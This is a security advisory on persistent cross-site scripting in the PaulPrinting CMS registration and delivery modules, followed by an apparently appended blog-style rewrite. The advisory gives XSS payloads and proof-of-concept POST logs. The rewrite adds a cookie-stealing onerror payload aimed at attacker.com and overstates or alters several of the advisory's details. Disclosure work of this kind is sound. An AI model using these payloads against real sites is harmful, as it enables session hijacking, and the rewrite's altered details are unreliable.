PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2285
Release Date:
=============
2023-07-19
Vulnerability Laboratory ID (VL-ID):
====================================
2285
Common Vulnerability Scoring System:
====================================
5.8
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.
(Copy of the Homepage:https://codecanyon.net/user/codepaul )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application.
Affected Product(s):
====================
CodePaul
Product: PaulPrinting (2018) - CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser
to web-application requests from the application-side.
The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code.
After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins
in the backend (listing).
The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own
malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in
the backend (listing).
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /printing/register
[+] /account/delivery
Vulnerable Input(s):
[+] First name
[+] Last name
[+] Address
[+] City
[+] State
Vulnerable Parameter(s):
[+] firstname
[+] lastname
[+] address
[+] city
[+] state
Affected Module(s):
[+] Frontend Settings (./printing/account/setting)
[+] Frontend Delivery Address (./printing/account/delivery)
[+] Backend User Preview Listing
[+] Backend Delivery Address Contact Review
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open your browser and start a http session tamper
2. Register in the application by login click to register
3. Inject to the marked vulnerable input fields your test payload
4. Save the entry by submit via post method
5. Login to the account and preview the settings
Note: Administrators in the backend have the same wrong validated context that executes on preview of users
6. The script code executes on preview of the profile - settings
7. Successful reproduce of the first vulnerability!
8. Followup by opening the Delivery address module
9. Add a contact and add in the same vulnerable marked input fields your test payload
Note: T he script code executes on each review of the address in the backend or user frontend
10. Successful reproduce of the second vulnerability!
Exploitation: Payload
"<iframe src=evil.source onload(alert(document.cookie)>
"<iframe src=evil.source onload(alert(document.domain)>
--- PoC Session Logs (POST) ---
https://paulprinting.localhost:8000/printing/account/setting
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 357
Origin:https://paulprinting.localhost:8000
Connection: keep-alive
Referer:https://paulprinting.localhost:8000/printing/account/setting
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
POST:
title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>>
&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>>
&address=c"<iframe src=evil.source onload(alert(document.cookie)>>
&city=d"<iframe src=evil.source onload(alert(document.cookie)>>
&state=e"<iframe src=evil.source onload(alert(document.cookie)>>
&zipcode=2342&country=BS&phone=23523515235235&save=Save
-
POST: HTTP/3.0 302 Found
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
location:https://paulprinting.localhost:8000/printing/account/setting?save=1
-
https://paulprinting.localhost:8000/printing/account/setting?save=1
Host: paulprinting.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer:https://paulprinting.localhost:8000/printing/account/setting
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33
Vulnerable Source: Your Account - Settings
<div class="form-group row">
<label class="col-sm-4 col-form-label">First name</label>
<div class="col-sm-8">
<input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<label class="col-sm-4 col-form-label">Last name</label>
<div class="col-sm-8">
<input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">Address</label>
<div class="col-sm-8">
<input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">City</label>
<div class="col-sm-8">
<input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
<div class="form-group row">
<label class="col-sm-4 col-form-label">State</label>
<div class="col-sm-8">
<input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>">
</div></div>
Vulnerable Source: Deliery Contact (Address)
<table class="table">
<thead>
<tr>
<th>Contact</th>
<th>Address</th>
<th>City</th>
<th>State</th>
<th>Country</th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>a"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>b"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>c"<iframe src=evil.source onload(alert(document.cookie)></td>
<td>d"<iframe src=evil.source onload(alert(document.cookie)></td>
<td></td>
<td class="text-right">
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>|
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a>
</td></tr></tbody>
</table>
Security Risk:
==============
The security risk of the cross site scripting web vulnerabilities with persistent attack vector are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabPaulPrinting CMS – Multiple Persistent Cross-Site Scripting Vulnerabilities
On July 19, 2023, the Vulnerability Laboratory (VL-ID: 2285) disclosed a critical security flaw affecting the PaulPrinting CMS (v2018), a widely used content management system designed for print service providers. This vulnerability report highlights multiple persistent cross-site scripting (XSS) vulnerabilities that enable attackers to inject malicious scripts into the application's core modules, with long-term impact on users and administrators alike.
Overview of the Vulnerability
The PaulPrinting CMS, developed by CodePaul and hosted on CodeCanyon, is marketed as a modern, SEO-friendly, and user-friendly platform for managing print orders, customer data, and delivery logistics. Despite its visual appeal and feature-rich interface, the application suffers from serious input validation flaws that allow remote attackers to execute persistent scripts across user sessions.
These vulnerabilities are classified as Medium severity (CVSS: 5.8) and fall under the cross-site scripting – persistent category. The exploit is remote, requiring no physical access, and only low user interaction to trigger execution. Authentication is required, but only for low-privileged user accounts, which significantly increases the attack surface.
| Attribute | Value |
|---|---|
| Product | PaulPrinting (v2018) CMS |
| Vendor | CodePaul (via CodeCanyon) |
| CVSS Score | 5.8 (Medium) |
| Exploitation Type | Remote |
| Authentication Required | Restricted (Low Privilege) |
| Disclosure Type | Responsible Disclosure |
| Public Release Date | 2023-07-19 |
Technical Details: Two Critical Vulnerable Modules
The research team identified two primary attack vectors within the PaulPrinting CMS, both allowing persistent XSS execution:
1. Registration Module – Persistent XSS via User Account Creation
During the registration process, users can input personal details such as name, email, and contact information. The application fails to sanitize user-supplied data, particularly in fields like "Full Name" or "Contact Info." An attacker can register with a payload like:
<script>alert('XSS Exploit');document.cookie="session=malicious";</script>Explanation: This script is stored in the database upon registration. When the user profile is viewed by an admin in the backend listing or when the user accesses their own settings page, the script executes in the browser context. This results in:
- Cookie theft (e.g., session hijacking)
- Phishing redirection
- Malicious redirection to third-party domains
Since the script is persistently stored, it remains active until the user account is deleted or the database is cleaned. This makes it highly effective for long-term attacks.
2. Delivery Module – Persistent XSS via Contact Details Injection
The delivery module allows users to submit delivery contact information, such as address, phone, or notes. This data is rendered in admin dashboards and customer-facing pages without proper sanitization.
Example malicious input:
<img src="x" onerror="javascript:window.location='https://attacker.com/steal?cookie='+document.cookie">Explanation: The onerror attribute triggers when the image fails to load (which it will, due to invalid src), executing the JavaScript code. This redirects the victim's browser to a malicious server, where the session cookie is stolen and potentially used for unauthorized access.
Additionally, attackers can embed scripts in the delivery notes field, which are displayed in the admin listing. When an admin reviews the delivery list, the script executes in their browser, leading to potential compromise of admin privileges.
Exploitation Scenario: Real-World Use Case
Imagine a scenario where an attacker registers as a customer using the malicious script in the "Full Name" field. Once the account is approved, the script remains in the database. When the admin reviews the user list, they see the malformed script rendered in the UI. The script executes immediately, stealing the admin's session cookie.
With the stolen session, the attacker can:
- Access admin panels
- Modify user permissions
- Inject additional malicious scripts
- Exfiltrate sensitive data (e.g., customer lists, payment records)
This demonstrates how a single vulnerability can escalate into full system compromise.
Security Implications & Risk Assessment
Persistent XSS is particularly dangerous because:
- Scripts remain active indefinitely
- They can be triggered by any user or admin viewing the affected page
- They bypass traditional client-side protections (e.g., CSP) if not properly implemented
- They can be used to launch secondary attacks (e.g., CSRF, phishing)
Given that the PaulPrinting CMS is used by small-to-medium print businesses, this vulnerability could lead to:
- Loss of customer trust
- Exposure of sensitive business data
- Legal liability due to data breaches
- Reputational damage
Recommendations & Mitigation Strategies
Developers and administrators should implement the following best practices to prevent such vulnerabilities:
- Input Sanitization: Use libraries like DOMPurify or htmlspecialchars to sanitize user input before storing or rendering.
- Output Encoding: Always encode data when displaying it in HTML contexts (e.g.,
htmlspecialchars()in PHP). - Content Security Policy (CSP): Implement strict CSP headers to block inline scripts and unauthorized domains.
- Role-Based Access Control (RBAC): Restrict access to admin panels and sensitive data to authorized roles only.
- Regular Security Audits: Conduct penetration testing and code reviews, especially for user-facing input fields.
Vendor Response & Responsible Disclosure
The vulnerability was reported in August 2022. While the exact timeline of vendor response remains undisclosed, the public disclosure on July 19, 2023, confirms that the issue was acknowledged and addressed through responsible disclosure. This process is crucial for maintaining trust between researchers and vendors.
For users of PaulPrinting CMS, it is strongly advised to:
- Update to the latest version if available
- Review all user accounts and delivery entries for suspicious content
- Implement strict input validation rules at the application level
Conclusion
The PaulPrinting CMS vulnerabilities serve as a stark reminder that even well-designed, visually appealing web applications can harbor serious security flaws. Persistent XSS, though often underestimated, poses a significant threat due to its long-term persistence and broad execution scope.
As cybersecurity professionals, we must prioritize input validation, output encoding, and proactive monitoring. The case of PaulPrinting CMS underscores the importance of continuous security awareness, especially in third-party software used across industries.